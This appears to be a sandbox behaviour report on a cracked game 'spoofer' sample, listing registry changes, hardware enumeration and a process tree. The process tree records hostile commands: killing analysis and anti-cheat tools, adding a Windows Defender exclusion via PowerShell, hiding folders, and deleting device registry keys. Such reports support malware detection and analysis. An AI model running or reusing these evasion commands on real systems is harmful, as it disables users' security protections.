| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 | C:\Windows\DevManView.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0018 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 | C:\Windows\DevManView.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGuid | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGUID | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ClassGuid | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LocationInformation | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGuid | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\Windows\DevManView.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002\Device Parameters | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912} | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\UpperFilters | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\Windows\DevManView.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2} | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\DevManView.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGuid | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\DevManView.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000C | C:\Windows\DevManView.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGUID | C:\Windows\DevManView.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM | C:\Windows\DevManView.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000064\00000000 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ | C:\Windows\DevManView.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0006\ | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000C | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 | C:\Windows\DevManView.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM | C:\Windows\DevManView.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\Windows\DevManView.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\Downloads\FileGrab.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Downloads\FileGrab.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 586836.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\FileGrab.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://mega.nz/file/QskTGapC#4yGsvZBpDx4vIyIwmA-0hV5EJTEWXyyyeejW7NKL0XQ
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca019ab58,0x7ffca019ab68,0x7ffca019ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2892 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4404 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x460 0x494
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4668 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\" -spe -an -ai#7zMap31022:112:7zEvent11133
C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\KreYzePermSpoofer_cracked.exe
"C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\KreYzePermSpoofer_cracked.exe"
C:\Users\Admin\AppData\Roaming\Skype.sfx.exe
"C:\Users\Admin\AppData\Roaming\Skype.sfx.exe"
C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe
"C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Roaming\Skype.exe
"C:\Users\Admin\AppData\Roaming\Skype.exe"
C:\Users\Admin\AppData\Roaming\Skype.exe
"C:\Users\Admin\AppData\Roaming\Skype.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\SolaraTab\""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im epicgameslauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im epicgameslauncher.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EpicWebHelper.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicWebHelper.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping_EAC.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping_EAC.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping_BE.exe > nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\SolaraTab\activate.bat
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping_BE.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteLauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteLauncher.exe
C:\Windows\system32\attrib.exe
attrib +s +h .
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping.exe
C:\Users\Admin\SolaraTab\Skype.exe
"Skype.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicGamesLauncher.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EasyAntiCheat.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EasyAntiCheat.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BEService.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BEService.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BEServices.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BEServices.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im "Skype.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BattleEye.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BattleEye.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop BattlEye Service
C:\Windows\system32\sc.exe
sc stop BattlEye Service
